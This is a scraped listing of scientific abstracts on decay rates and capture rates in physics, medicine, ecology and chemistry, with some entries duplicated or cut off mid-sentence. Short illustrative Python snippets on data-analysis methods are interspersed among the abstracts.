Baseline variables, technical outcome (Thrombolysis In Cerebral Infarction, TICI), 24 hours imaging outcome, and 3-month clinical outcome (modified Rankin Scale, mRS) were prospectively recorded. The patients were stratified according to clot location, groups compared, and logistic regression models devised to study the effect of device selection on the clinical outcome. The technical success rates were equal in both proximal (internal carotid artery and proximal M1 segment) and distal occlusions (distal M1 and M2 segments). The proportion of TICI 2b or 3 was 96% and 87% with TREVO and 87% and 89% with Capture LP (p=0.25 and p=0.80, respectively). Device selection did not significantly predict good clinical outcome (mRS ≤2) in either proximal or distal occlusions. In multivariate analysis, selecting Capture LP borderline significantly increased the odds of an excellent outcome close to sixfold both in proximal and distal occlusions (OR 6.7, 95% CI 0.82 to 53.7, p=0.08 and OR 5.7, 95% CI 0.88 to 37.8, p=0.07, respectively). TREVO and Capture LP perform equally well in proximal and distal occlusions in the anterior circulation when technical and good clinical outcome are considered. Capture LP may have a small advantage in reaching mRS ≤1 at 3 months. However, this needs to be confirmed in a randomized study. Published by the BMJ Publishing Group Limited. For permission to use (where not already granted under a licence) please go to http://www.bmj.com/company/products-services/rights-and-licensing/. 11. Observation of Dicke superradiance for two artificial atoms in a cavity with high decay rate. PubMed Mlynek, J A; Abdumalikov, A A; Eichler, C; Wallraff, A 2014-11-04 An individual excited two-level system decays to its ground state in a process known as spontaneous emission. The probability of detecting the emitted photon decreases exponentially with the time passed since its excitation. In 1954, Dicke first considered the more subtle situation in which two emitters decay in close proximity to each other. He argued that the emission dynamics of a single two-level system is altered by the presence of a second one, even if it is in its ground state. Here, we present a close to ideal realization of Dicke's original two-spin Gedankenexperiment, using a system of two individually controllable superconducting qubits weakly coupled to a fast decaying microwave cavity. The two-emitter case of superradiance is explicitly demonstrated both in time-resolved measurements of the emitted power and by fully reconstructing the density matrix of the emitted field in the photon number basis. 12. Enhanced Dark Matter Annihilation Rate for Positron and Electron Excesses from Q-Ball Decay SciTech Connect McDonald, John 2009-10-09 We show that Q-ball decay in Affleck-Dine baryogenesis models can account for dark matter when the annihilation cross section is sufficiently enhanced to explain the positron and electron excesses observed by PAMELA, ATIC, and PPB-BETS. For Affleck-Dine baryogenesis along a d=6 flat direction, the reheating temperature is approximately 30 GeV and the Q-ball decay temperature is in the range of 10-100 MeV. The lightest supersymmetric particles produced by Q-ball decay annihilate down to the observed dark matter density if the cross section is enhanced by a factor approx10{sup 3} relative to the thermal relic cross section. 13. Rates, polarizations, and asymmetries in charmless vector-vector B meson decays. 
PubMed 2003-10-24 With a sample of approximately 89 x 10(6) B(-)B pairs collected with the BABAR detector, we perform a search for B meson decays into pairs of charmless vector mesons (phi, rho, and K*). We measure the branching fractions, determine the degree of longitudinal polarization, and search for CP violation asymmetries in the processes B+-->phiK(*+), B0-->phiK(*0), B+-->rho(0)K(*+), and B+-->rho(0)rho(+). We also set an upper limit on the branching fraction for the decay B0-->rho(0)rho(0). 14. Shell-model calculations of beta-decay rates for s- and r-process nucleosyntheses Takahashi, K.; Mathews, G. J.; Bloom, S. D. 1985-10-01 Examples of large-basis shell-model calculations of Gamow-Teller (BETA)-decay properties of specific interest in the astrophysical s- and r- processes are presented. Numerical results are given for: (1) the GT-matrix elements for the excited state decays of the unstable s-process nucleus Tc-99; and (2) the GT-strength function for the neutron-rich nucleus Cd-130, which lies on the r-process path. The results are discussed in conjunction with the astrophysics problems. 15. Rates, Polarizations, and Asymmetries in Charmless Vector-Vector B Meson Decays 2003-10-01 With a sample of approximately 89×106 BB¯ pairs collected with the BABAR detector, we perform a search for B meson decays into pairs of charmless vector mesons (φ, ρ, and K*). We measure the branching fractions, determine the degree of longitudinal polarization, and search for CP violation asymmetries in the processes B+→φK*+, B0→φK*0, B+→ρ0K*+, and B+→ρ0ρ+. We also set an upper limit on the branching fraction for the decay B0→ρ0ρ0. 16. Residence times and decay rates of downed woody debris biomass/carbon in eastern US forests Treesearch Matthew B. Russell; Christopher W. Woodall; Shawn Fraver; Anthony W. D' Amato; Grant M. Domke; Kenneth E. Skog 2014-01-01 A key component in describing forest carbon (C) dynamics is the change in downed dead wood biomass through time. Specifically, there is a dearth of information regarding the residence time of downed woody debris (DWD), which may be reflected in the diversity of wood (for example, species, size, and stage of decay) and site attributes (for example, climate) across the... 17. Measurement of the Branching Fraction and Decay Rate Asymmetry of B to D_pi+ pi- pi0 K- SciTech Connect Aubert, B.; Barate, R.; Boutigny, D.; Couderc, F.; Karyotakis, Y.; Lees, J.P.; Poireau, V.; Tisserand, V.; Zghiche, A.; Grauges, E.; Palano, A.; Pappagallo, M.; Pompili, A.; Chen, J.C.; Qi, N.D.; Rong, G.; Wang, P.; Zhu, Y.S.; Eigen, G.; Ofte, I.; Stugu, B. /Bergen U. /LBL, Berkeley /UC, Berkeley /Birmingham U. /Ruhr U., Bochum /Bristol U. /British Columbia U. /Brunel U. /Novosibirsk, IYF /UC, Irvine /UCLA /UC, Riverside /UC, San Diego /UC, Santa Barbara /UC, Santa Cruz /Caltech /Cincinnati U. /Colorado U. /Colorado State U. /Dortmund U. /Dresden, Tech. U. /Ecole Polytechnique /Edinburgh U. /Ferrara U. /INFN, Ferrara /Frascati /Genoa U. /INFN, Genoa /Harvard U. /Heidelberg U. /Imperial Coll., London /Iowa U. /Iowa State U. /Orsay, LAL /LLNL, Livermore /Liverpool U. /Queen Mary, U. of London /Royal Holloway, U. of London /Louisville U. /Manchester U. /Maryland U. /Massachusetts U., Amherst /MIT, LNS /McGill U. /Milan U. /INFN, Milan /Mississippi U. /Montreal U. /Mt. Holyoke Coll. /Naples U. /INFN, Naples /NIKHEF, Amsterdam /Notre Dame U. /Ohio State U. /Oregon U. /Padua U. /INFN, Padua /Paris U., VI-VII /Pennsylvania U. /Perugia U. /INFN, Perugia /Pisa U. 
/INFN, Pisa /Prairie View A-M /Princeton U. /Rome U. /INFN, Rome /Rostock U. /Rutherford /DAPNIA, Saclay /South Carolina U. /SLAC /Oregon U. /SLAC /SLAC /Stanford U., Phys. Dept. /SUNY, Stony Brook /Tennessee U. /Texas U. /Texas U., Dallas /Turin U. /INFN, Turin /Trieste U. /INFN, Trieste /Valencia U., IFIC /Vanderbilt U. /Victoria U. /Warwick U. /Wisconsin U., Madison /Yale U. 2005-06-10 The authors report the observation of the decay B{sup -} {yields} D{sub {pi}{sup +}{pi}{sup -}{pi}{sup 0}}K{sup -}, where D{sub {pi}{sup +}{pi}{sup -}{pi}{sup 0}} indicates a neutral D meson detected in the final state {pi}{sup +}{pi}{sup -}{pi}{sup 0}, excluding K{sub S}{sup 0}{pi}{sup 0}. This doubly Cabibbo-suppressed decay chain can be used to measure the CKM phase {gamma}. Using about 229 million e{sup +}e{sup -} {yields} B{bar B} events recorded by the BABAR experiment at the PEP-II e{sup +}e{sup -} storage ring, they measure the branching fraction {Beta}(B{sup -} {yields} D{sub {pi}{sup +}{pi}{sup -}{pi}{sup 0}K{sup -}}) = (5.5 {+-} 1.0 (stat.) {+-} 0.7 (syst.)) x 10{sup -6} and the decay rate asymmetry A = -0.02 {+-} 0.16 (stat.) {+-} 0.03 (syst.) for the full decay chain. 18. Experimental investigation of effects of jet decay rate on jet-induced pressures on a flat plate: Tabulated data NASA Technical Reports Server (NTRS) Kuhlman, J. M.; Ousterhout, D. S.; Warcup, R. W. 1978-01-01 Tabular data are presented for an experimental study of the effects of jet decay rate on the jet-induced pressure distribution on a flat plate for a single jet issuing at right angle to the flat plate into a uniform crossflow. The data are presented in four sections: (1) presents the static nozzle calibration data; (2) lists the plate surface static pressure data and integrated loads; (3) lists the jet centerline trajectory data; and (4) lists the centerline dynamic pressure data. 19. Detailed microscopic calculation of stellar electron and positron capture rates on 24Mg for O+Ne+Mg core simulations Nabi, Jameel-Un 2008-09-01 A few white dwarfs, located in binary systems, may acquire sufficiently high mass-accretion rates resulting in the burning of carbon and oxygen under nondegenerate conditions forming an O+Ne+Mg core. These O+Ne+Mg cores are gravitationally less bound than more massive progenitor stars and can release more energy due to the nuclear burning. They are also amongst the probable candidates for low entropy r-process sites. Recent observations of subluminous Type II-P supernovae (e.g. 2005cs, 2003gd, 1999br and 1997D) were able to rekindle the interest in 8-10 Modot which develop O+Ne+Mg cores. Microscopic calculations of capture rates on 24Mg, which may contribute significantly to the collapse of O+Ne+Mg cores, using the shell model and the proton-neutron quasiparticle random-phase approximation (pn-QRPA) theory, were performed earlier and comparisons made. Simulators, however, may require these capture rates on a fine scale. For the first time, a detailed microscopic calculation of the electron and positron capture rates on 24Mg on an extensive temperature-density scale is presented here. This type of scale is more appropriate for interpolation purposes and of greater utility for simulation codes. The calculations are done using the pn-QRPA theory using a separable interaction. The deformation parameter, believed to be a key parameter in QRPA calculations, is adopted from experimental data to increase the reliability of the QRPA results further. 
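Fine temperature-density grids like the 24Mg capture-rate table described above are typically consumed by simulation codes through interpolation of log10(rate). The snippet below is a generic sketch of such an interpolation, bilinear in the grid coordinates; the miniature table, grid values, and query point are made-up placeholders, not the pn-QRPA results.

```python
# Bilinear interpolation of a log10(rate) table on a (log T, log rho*Ye) grid.
# The tiny table below is a made-up placeholder, not the pn-QRPA rates.
import numpy as np
from scipy.interpolate import RegularGridInterpolator

logT   = np.array([8.0, 9.0, 10.0])           # log10 temperature (K)
logRho = np.array([6.0, 8.0, 10.0])           # log10 (rho * Ye) (g/cm^3)
log_rate = np.array([[-8.0, -6.5, -5.0],      # rows: logT, columns: logRho
                     [-6.0, -4.5, -3.0],
                     [-4.0, -2.5, -1.0]])

interp = RegularGridInterpolator((logT, logRho), log_rate)   # linear by default
point = np.array([[9.3, 7.2]])                # query: log T = 9.3, log rho*Ye = 7.2
rate = 10.0 ** interp(point)[0]
print(f"interpolated capture rate ≈ {rate:.3e} s^-1")
```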
The resulting calculated rates are enhanced by up to a factor of 14 or more compared to shell-model rates and may lead to some interesting scenarios for core-collapse simulators. 20. Power Spectrum Analysis of Physikalisch-Technische Bundesanstalt Decay-Rate Data: Evidence for Solar Rotational Modulation Sturrock, P. A.; Buncher, J. B.; Fischbach, E.; Gruenwald, J. T.; Javorsek, D.; Jenkins, J. H.; Lee, R. H.; Mattes, J. J.; Newport, J. R. 2010-12-01 Evidence for an anomalous annual periodicity in certain nuclear-decay data has led to speculation on a possible solar influence on nuclear processes. We have recently analyzed data concerning the decay rates of 36Cl and 32Si, acquired at the Brookhaven National Laboratory (BNL), to search for evidence that might be indicative of a process involving solar rotation. Smoothing of the power spectrum by weighted-running-mean analysis leads to a significant peak at frequency 11.18 year⁻¹, which is lower than the equatorial synodic rotation rates of the convection and radiative zones. This article concerns measurements of the decay rates of 226Ra acquired at the Physikalisch-Technische Bundesanstalt (PTB) in Germany. We find that a similar (but not identical) analysis yields a significant peak in the PTB dataset at frequency 11.21 year⁻¹, and a peak in the BNL dataset at 11.25 year⁻¹. The change in the BNL result is not significant, since the uncertainties in the BNL and PTB analyses are estimated to be 0.13 year⁻¹ and 0.07 year⁻¹, respectively. Combining the two running means by forming the joint power statistic leads to a highly significant peak at frequency 11.23 year⁻¹. We will briefly comment on the possible implications of these results for solar physics and for particle physics. 1. General decay rates for the wave equation with mixed-type damping mechanisms on unbounded domain with finite measure Dias Silva, Flávio R.; Nascimento, Flávio A. F.; Rodrigues, José H. 2015-12-01 This paper is concerned with the study of the uniform decay rates of the energy associated with the wave equation subject to a locally distributed viscoelastic dissipation and a nonlinear frictional damping, u_tt − Δu + ∫₀ᵗ g(t−s) div[a(x)∇u(s)] ds + b(x) f(u_t) = 0 on Ω × ]0,∞[, where Ω ⊂ ℝⁿ, n ≥ 2, is an unbounded open set with finite measure and unbounded smooth boundary ∂Ω = Γ. Supposing that the localization functions satisfy the "competitive" assumption a(x) + b(x) ≥ δ > 0 for all x ∈ Ω and that the relaxation function g satisfies certain nonlinear differential inequalities introduced by Lasiecka et al. (J Math Phys 54(3):031504, 2013), we extend to our considered domain the prior results of Cavalcanti and Oquendo (SIAM J Control Optim 42(4):1310-1324, 2003). In addition, while Cavalcanti and Oquendo (2003) consider only exponential and polynomial decay rate estimates, in the present article general decay rate estimates are obtained. 2. Modelling the Effects of Prey Size and Distribution on Prey Capture Rates of Two Sympatric Marine Predators PubMed Central Thaxter, Chris B.; Daunt, Francis; Grémillet, David; Harris, Mike P.; Benvenuti, Silvano; Watanuki, Yutaka; Hamer, Keith C.; Wanless, Sarah 2013-01-01 Understanding how prey capture rates are influenced by feeding ecology and environmental conditions is fundamental to assessing anthropogenic impacts on marine higher predators. 
We compared how prey capture rates varied in relation to prey size, prey patch distribution and prey density for two species of alcid, common guillemot (Uria aalge) and razorbill (Alca torda) during the chick-rearing period. We developed a Monte Carlo approach parameterised with foraging behaviour from bird-borne data loggers, observations of prey fed to chicks, and adult diet from water-offloading, to construct a bio-energetics model. Our primary goal was to estimate prey capture rates, and a secondary aim was to test responses to a set of biologically plausible environmental scenarios. Estimated prey capture rates were 1.5±0.8 items per dive (0.8±0.4 and 1.1±0.6 items per minute foraging and underwater, respectively) for guillemots and 3.7±2.4 items per dive (4.9±3.1 and 7.3±4.0 items per minute foraging and underwater, respectively) for razorbills. Based on species' ecology, diet and flight costs, we predicted that razorbills would be more sensitive to decreases in 0-group sandeel (Ammodytes marinus) length (prediction 1), but guillemots would be more sensitive to prey patches that were more widely spaced (prediction 2), and lower in prey density (prediction 3). Estimated prey capture rates increased non-linearly as 0-group sandeel length declined, with the slope being steeper in razorbills, supporting prediction 1. When prey patches were more dispersed, estimated daily energy expenditure increased by a factor of 3.0 for guillemots and 2.3 for razorbills, suggesting guillemots were more sensitive to patchier prey, supporting prediction 2. However, both species responded similarly to reduced prey density (guillemot expenditure increased by 1.7; razorbill by 1.6), thus not supporting prediction 3. This bio-energetics approach complements other foraging models in predicting likely 3. Modelling the effects of prey size and distribution on prey capture rates of two sympatric marine predators. PubMed Thaxter, Chris B; Daunt, Francis; Grémillet, David; Harris, Mike P; Benvenuti, Silvano; Watanuki, Yutaka; Hamer, Keith C; Wanless, Sarah 2013-01-01 Understanding how prey capture rates are influenced by feeding ecology and environmental conditions is fundamental to assessing anthropogenic impacts on marine higher predators. We compared how prey capture rates varied in relation to prey size, prey patch distribution and prey density for two species of alcid, common guillemot (Uria aalge) and razorbill (Alca torda) during the chick-rearing period. We developed a Monte Carlo approach parameterised with foraging behaviour from bird-borne data loggers, observations of prey fed to chicks, and adult diet from water-offloading, to construct a bio-energetics model. Our primary goal was to estimate prey capture rates, and a secondary aim was to test responses to a set of biologically plausible environmental scenarios. Estimated prey capture rates were 1.5 ± 0.8 items per dive (0.8 ± 0.4 and 1.1 ± 0.6 items per minute foraging and underwater, respectively) for guillemots and 3.7 ± 2.4 items per dive (4.9 ± 3.1 and 7.3 ± 4.0 items per minute foraging and underwater, respectively) for razorbills. Based on species' ecology, diet and flight costs, we predicted that razorbills would be more sensitive to decreases in 0-group sandeel (Ammodytes marinus) length (prediction 1), but guillemots would be more sensitive to prey patches that were more widely spaced (prediction 2), and lower in prey density (prediction 3). 
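The bio-energetics model described above is parameterised by Monte Carlo draws over dive behaviour and prey characteristics. The snippet below is a stripped-down sketch of that idea: it draws dive durations and per-minute capture rates from assumed distributions and propagates them into items per dive. All distributions and parameter values are invented for illustration and are not the study's inputs.

```python
# Monte Carlo propagation of dive duration and capture rate into items per dive.
# All distributions and parameters are illustrative assumptions.
import numpy as np

rng = np.random.default_rng(42)
n = 100_000

dive_minutes = rng.gamma(shape=4.0, scale=0.3, size=n)       # underwater time per dive
items_per_min = rng.lognormal(mean=0.0, sigma=0.5, size=n)   # capture rate while underwater

items_per_dive = dive_minutes * items_per_min
print(f"items per dive: {items_per_dive.mean():.2f} ± {items_per_dive.std():.2f}")
```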
Estimated prey capture rates increased non-linearly as 0-group sandeel length declined, with the slope being steeper in razorbills, supporting prediction 1. When prey patches were more dispersed, estimated daily energy expenditure increased by a factor of 3.0 for guillemots and 2.3 for razorbills, suggesting guillemots were more sensitive to patchier prey, supporting prediction 2. However, both species responded similarly to reduced prey density (guillemot expenditure increased by 1.7; razorbill by 1.6), thus not supporting prediction 3. This bio-energetics approach complements other foraging models in 4. Estimating Suicide Rates in Developing Nations: A Low-Cost Newspaper Capture-Recapture Approach in Cambodia. PubMed Harris, Keith M; Thandrayen, Joanne; Samphoas, Chien; Se, Pros; Lewchalermwongse, Boontriga; Ratanashevorn, Rattanakorn; Perry, Megan L; Britts, Choloe 2016-04-01 This study tested a low-cost method for estimating suicide rates in developing nations that lack adequate statistics. Data comprised reported suicides from Cambodia's 2 largest newspapers. Capture-recapture modeling estimated a suicide rate of 3.8/100 000 (95% CI = 2.5-6.7) for 2012. That compares to World Health Organization estimates of 1.3 to 9.4/100 000 and a Cambodian government estimate of 3.5/100 000. Suicide rates of males were twice that of females, and rates of those <40 years were twice that of those ≥40 years. Capture-recapture modeling with newspaper reports proved a reasonable method for estimating suicide rates for countries with inadequate official data. These methods are low-cost and can be applied to regions with at least 2 newspapers with overlapping reports. Means to further improve this approach are discussed. These methods are applicable to both recent and historical data, which can benefit epidemiological work, and may also be applicable to homicides and other statistics. © 2016 APJPH. 5. Ground-state proton decay of 69Br and implications for the 68Se astrophysical rapid proton-capture process waiting point. PubMed Rogers, A M; Famiano, M A; Lynch, W G; Wallace, M S; Amorini, F; Bazin, D; Charity, R J; Delaunay, F; de Souza, R T; Elson, J; Gade, A; Galaviz, D; van Goethem, M-J; Hudan, S; Lee, J; Lobastov, S; Lukyanov, S; Matoš, M; Mocko, M; Schatz, H; Shapira, D; Sobotka, L G; Tsang, M B; Verde, G 2011-06-24 We report on the first direct measurement of the proton separation energy for the proton-unbound nucleus (69)Br. Bypassing the (68)Se waiting point in the rp process is directly related to the 2p-capture rate through (69)Br, which depends exponentially on the proton separation energy. We find a proton separation energy for (69)Br of Sp((69)Br )= -785(-40)(+34) keV; this is less bound compared to previous predictions which have relied on uncertain theoretical calculations. The influence of the extracted proton separation energy on the rp process occurring in type I x-ray bursts is examined within the context of a one-zone burst model. 6. Computing decay rates for new physics theories with FEYNRULES and MADGRAPH 5_AMC@NLO Alwall, Johan; Duhr, Claude; Fuks, Benjamin; Mattelaer, Olivier; Öztürk, Deniz Gizem; Shen, Chia-Hsien 2015-12-01 We present new features of the FEYNRULES and MADGRAPH 5_AMC@NLO programs for the automatic computation of decay widths that consistently include channels of arbitrary final-state multiplicity. The implementations are generic enough so that they can be used in the framework of any quantum field theory, possibly including higher-dimensional operators. 
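The suicide-rate entry above estimates the total number of cases from two overlapping newspaper lists. For two sources, the bias-corrected Chapman estimator is the standard closed form, N̂ = (n1+1)(n2+1)/(m+1) − 1, where m is the number of cases reported by both papers. The counts and population denominator in the sketch below are invented for illustration; the study fitted capture-recapture models to its own data.

```python
# Two-source (Chapman) capture-recapture estimate of total cases.
# n1, n2, m, and the population denominator are invented, not the Cambodian data.
n1, n2, m = 120, 95, 40           # cases in paper 1, paper 2, and in both

n_hat = (n1 + 1) * (n2 + 1) / (m + 1) - 1
var = ((n1 + 1) * (n2 + 1) * (n1 - m) * (n2 - m)) / ((m + 1) ** 2 * (m + 2))
se = var ** 0.5

population = 15_000_000           # assumed population denominator
rate_per_100k = n_hat / population * 100_000
print(f"estimated cases: {n_hat:.0f} ± {1.96 * se:.0f} (≈ {rate_per_100k:.2f} per 100 000)")
```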
We extend at the same time the conventions of the Universal FEYNRULES Output (or UFO) format to include decay tables and information on the total widths. We finally provide a set of representative examples of the usage of the new functions of the different codes in the framework of the Standard Model, the Higgs Effective Field Theory, the Strongly Interacting Light Higgs model and the Minimal Supersymmetric Standard Model and compare the results to available literature and programs for validation purposes. 7. Auger decay rates of core hole states using equation of motion coupled cluster method Ghosh, Aryya; Vaval, Nayana; Pal, Sourav 2017-01-01 The recent development of Linac coherent light source high intense X-ray laser makes it possible to create double core ionization in the molecule. The generation of double core hole state and its decay is identified by Auger spectroscopy. The decay of this double core hole (DCH) states can be used as a powerful spectroscopic tool in chemical analysis. In the present work, we have implemented a promising approach, known as CAP-EOMCC method, which is a combination of complex absorbing potential (CAP) and equation-of-motion coupled cluster (EOMCC) approach to calculate the lifetime of single and double core hole states. We have applied this method to calculate the lifetime of the single core hole (K-LL) and double core hole (KK-KLL) states of CH4, NH3 and HF molecules. The predicted lifetime is found to be extremely short. 8. Evidence for CP violation in time-integrated D0→h(-)h(+) decay rates. PubMed 2012-03-16 A search for time-integrated CP violation in D(0)→h(-)h(+) (h=K, π) decays is presented using 0.62 fb(-1) of data collected by LHCb in 2011. The flavor of the charm meson is determined by the charge of the slow pion in the D(*+)→D(0)π(+) and D(*-)→D[over ¯](0)π(-) decay chains. The difference in CP asymmetry between D(0)→K(-)K(+) and D(0)→π(-)π(+), ΔA(CP)≡A(CP)(K(-)K(+))-A(CP)(π(-)π(+)), is measured to be [-0.82±0.21(stat)±0.11(syst)]%. This differs from the hypothesis of CP conservation by 3.5 standard deviations. 9. Evidence for CP Violation in Time-Integrated D0→h-h+ Decay Rates 2012-03-01 A search for time-integrated CP violation in D0→h-h+ (h=K, π) decays is presented using 0.62fb-1 of data collected by LHCb in 2011. The flavor of the charm meson is determined by the charge of the slow pion in the D*+→D0π+ and D*-→D¯0π- decay chains. The difference in CP asymmetry between D0→K-K+ and D0→π-π+, ΔACP≡ACP(K-K+)-ACP(π-π+), is measured to be [-0.82±0.21(stat)±0.11(syst)]%. This differs from the hypothesis of CP conservation by 3.5 standard deviations. 10. Real-Time Imaging of Ground Cover: Relationships with Radiation Capture, Canopy Photosynthesis, and Daily Growth Rate NASA Technical Reports Server (NTRS) Klassen, S. P.; Ritchie, G.; Frantz, J. M.; Pinnock, D.; Bugbee, B. 2003-01-01 Cumulative absorbed radiation is highly correlated with crop biomass and yield. In this chapter we describe the use of a digital camera and commercial imaging software for estimating daily radiation capture, canopy photosynthesis, and relative growth rate. Digital images were used to determine percentage of ground cover of lettuce (Lactuca sativa L.) communities grown at five temperatures. Plants were grown in a steady-state, 10-chamber CO2 gas exchange system, which was used to measure canopy photosynthesis and daily carbon gain. 
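Percentage ground cover from nadir digital images, as used in the study above, can be approximated by classifying "green" pixels. The snippet below is a minimal sketch with a synthetic RGB array and a simple excess-green threshold; real workflows calibrate the threshold, lighting, and camera geometry, which the commercial imaging software cited in the study handles.

```python
# Percentage ground cover from a synthetic RGB image via an excess-green index.
# The synthetic image and threshold are illustrative, not the study's pipeline.
import numpy as np

rng = np.random.default_rng(7)
img = rng.integers(0, 256, size=(480, 640, 3)).astype(float)   # stand-in for a canopy photo

r, g, b = img[..., 0], img[..., 1], img[..., 2]
total = r + g + b + 1e-9
exg = 2 * g / total - r / total - b / total     # normalised excess-green index (2g - r - b)

canopy = exg > 0.05                             # threshold chosen only for illustration
ground_cover_pct = 100.0 * canopy.mean()
print(f"ground cover ≈ {ground_cover_pct:.1f}%")
```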
Daily measurements of percentage of ground cover were highly correlated with daily measurements of both absorbed radiation (r(sup 2) = 0.99) and daily carbon gain (r(sup 2) = 0.99). Differences among temperature treatments indicated that these relationships were influenced by leaf angle, leaf area index, and chlorophyll content. An analysis of the daily images also provided good estimates of relative growth rates, which were verified by gas exchange measurements of daily carbon gain. In a separate study we found that images taken at hourly intervals were effective for monitoring real-time growth. Our data suggests that hourly images can be used for early detection of plant stress. Applications, limitations, and potential errors are discussed. We have long known that crop yield is determined by the efficiency of four component processes: (i) radiation capture, (ii) quantum yield, (iii) carbon use efficiency, and (iv) carbon partitioning efficiency (Charles-Edwards, 1982; Penning de Vries & van Laar, 1982; Thornley, 1976). More than one-half century ago, Watson (1947, 1952) showed that variation in radiation capture accounted for almost all of the variation in yield between sites in temperate regions, because the three other components are relatively constant when the crop is not severely stressed. 
More recently, Monteith (1977) reviewed the literature on the close correlation between radiation capture and yield. Bugbee and Monje (1992 12. Decay rates of faecal indicator bacteria from sewage and ovine faeces in brackish and freshwater microcosms with contrasting suspended particulate matter concentrations. PubMed Perkins, Tracy L; Perrow, Karen; Rajko-Nenow, Paulina; Jago, Colin F; Jones, Davey L; Malham, Shelagh K; McDonald, James E 2016-12-01 To safeguard human health, legislative measures require the monitoring of faecal indicator bacteria (FIB) concentrations in recreational and shellfish waters. Consequently, numerous studies have focussed on FIB survival in the water column and more recently in estuarine sediments. However, there is a paucity of information regarding the influence of contrasting suspended particulate matter (SPM) concentrations on the survival of FIB in the water column of estuaries. Here, microcosms containing freshwater or brackish water with low, high and extreme SPM concentrations were inoculated with sewage and ovine faeces and the decay rate of Escherichia coli, coliforms and enterococci were determined by enumeration over five consecutive days. E. coli derived from ovine faeces proliferated and persisted at high levels in both freshwater and brackish microcosms (no decay), whereas ovine enterococci demonstrated a net decay over the duration of the experiment. Furthermore, SPM concentration had a significant effect on the decay rates of both E. coli and enterococci from ovine faeces in brackish microcosms, but decay rate was greater at low SPM concentrations for E. coli, whereas the opposite was observed for enterococci, whose decay rates increased as SPM concentration increased. E. coli, enterococci and coliforms derived from wastewater demonstrated a net decay in both freshwater and brackish microcosms, with contrasting effects of SPM concentration on decay rate. In addition, some FIB groups demonstrated contrasting responses (decay or proliferation) in the first 24h following inoculation into freshwater versus brackish microcosms. Overall, SPM concentrations influenced the proliferation and decay rates of FIB in brackish waters, but had minimal influence in freshwater. These results demonstrate that the survival rates of FIB in aquatic environments are system specific, species and source dependent, and influenced by SPM concentration. This study has important implications 13. A variable reaction rate model for chlorine decay in drinking water due to the reaction with dissolved organic matter. PubMed Hua, Pei; Vasyukova, Ekaterina; Uhl, Wolfgang 2015-05-15 A second order kinetic model for simulating chlorine decay in bulk water due to the reaction with dissolved organic matter (DOM) was developed. It takes into account the decreasing reactivity of dissolved organic matter using a variable reaction rate coefficient (VRRC) which decreases with an increasing conversion. The concentration of reducing species is surrogated by the maximum chlorine demand. Temperature dependency, respectively, is described by the Arrhenius-relationship. The accuracy and adequacy of the proposed model to describe chlorine decay in bulk water were evaluated and shown for very different waters and different conditions such as water mixing or rechlorination by applying statistical tests. It is thus very well suited for application in water quality modeling for distribution systems. 14. 
Decay Rate of Correlated Real-Space Delocalization Measures: Insights into Chemical Bonding and Mott Transitions from Hydrogen Chains. PubMed Gallo-Bueno, A; Kohout, M; Martı́n Pendás, A 2016-07-12 We study in this contribution the spatial decay rate of real-space localization and delocalization indices in correlated systems. To that end, we examine Hubbard and quantum chemical models of simple cyclic hydrogen chains, showing that all descriptors of delocalization converge quickly toward the infinite chain limits. It is then shown that the localization index may be understood as a generalization of the standard order parameter in Mott insulator transitions and that the origin of the enigmatic sigmoidal profile of delocalization indices in chemical bond-breaking processes lies in the nonlinear mapping between intersite distances and correlation parameters. Although the long-range asymptotic decay of delocalization indices is exponential, we show that as the correlation parameter decreases quantum mechanical interference sets in and a switch to an oscillating pattern, related to core chemical concepts such as resonance or mesomerism, appears. 15. Monte Carlo simulations of growth/decay rate constant ratios for small methanol clusters: Application to nucleation data analysis Hale, Barbara; Wilemski, Gerald; Viets, Aaron 2013-05-01 The Bennett Monte Carlo technique and the potential of van Leeuwen and Smit are used to calculate growth/decay rate constant ratios for small model methanol clusters at 220K, 240K and 260K. Temperature scaling properties of the rate constant ratios are demonstrated at these temperatures. The Monte Carlo results are used to study heat release from subcritical cluster formation in adiabatic nucleation rate measurements and to determine corrected final temperatures and supersaturation ratios for the methanol data of Strey, Wagner, and Schmeling. The corrected T and S values provide experimental rates with improved scaling properties. Nucleation rates are also calculated from the Monte Carlo free energy differences for the model methanol clusters and demonstrate the same scaling. 16. Monitoring oral temperature, heart rate, and respiration rate of West Indian manatees (Trichechus manatus) during capture and handling in the field USGS Publications Warehouse Wong, Arthur W.; Bonde, Robert K.; Siegal-Willott, Jessica; Stamper, M. Andrew; Colee, James; Powell, James A.; Reid, James P.; Deutsch, Charles J.; Harr, Kendal E. 2012-01-01 West Indian manatees (Trichechus manatus) are captured, handled, and transported to facilitate conservation, research, and rehabilitation efforts. Monitoring manatee oral temperature (OT), heart rate (HR), and respiration rate (RR) during out-of-water handling can assist efforts to maintain animal well-being and improve medical response to evidence of declining health. To determine effects of capture on manatee vital signs, we monitored OT, HR, and RR continuously for a 50-min period in 38 healthy, awake, juvenile and adult Florida manatees (T. m. latirostris) and 48 similar Antillean manatees (T. m. manatus). We examined creatine kinase (CK), potassium (K+), serum amyloid A (SAA), and lactate values for each animal to assess possible systemic inflammation and muscular trauma. OT range was 29.5 to 36.2° C, HR range was 32 to 88 beats/min, and RR range was 0 to 17 breaths/5 min. Antillean manatees had higher initial OT, HR, and RR than Florida manatees (p < 0.001). 
As monitoring time progressed, mean differences between the subspecies were no longer significant. High RR over monitoring time was associated with high lactate concentration. Antillean manatees had higher overall lactate values ([mean ± SD] 20.6 ± 7.8 mmol/L) than Florida manatees (13.7 ± 6.7 mmol/L; p < 0.001). We recommend monitoring manatee OT, HR, and RR during capture and handling in the field or in a captive care setting. 17. Development of a water boil-off spent-fuel calorimeter system. [To measure decay heat generation rate SciTech Connect Creer, J.M.; Shupe, J.W. Jr. 1981-05-01 A calorimeter system was developed to measure decay heat generation rates of unmodified spent fuel assemblies from commercial nuclear reactors. The system was designed, fabricated, and successfully tested using the following specifications: capacity of one BWR or PWR spent fuel assembly; decay heat generation range 0.1 to 2.5 kW; measurement time of < 12 h; and an accuracy of +-10% or better. The system was acceptance tested using a dc reference heater to simulate spent fuel assembly heat generation rates. Results of these tests indicated that the system could be used to measure heat generation rates between 0.5 and 2.5 kW within +- 5%. Measurements of heat generation rates of approx. 0.1 kW were obtained within +- 15%. The calorimeter system has the potential to permit measurements of heat generation rates of spent fuel assemblies and other devices in the 12- to 14-kW range. Results of calorimetry of a Turkey Point spent fuel assembly indicated that the assembly was generating approx. 1.55 kW. 18. Increasing capture efficiency of pallid sturgeon Scaphirhynchus albus (Forbes and Richardson, 1905) and the reliability of catch rate estimates USGS Publications Warehouse DeVries, R. J.; Hann, D. A.; Schramm, H.L. 2015-01-01 This study evaluated the 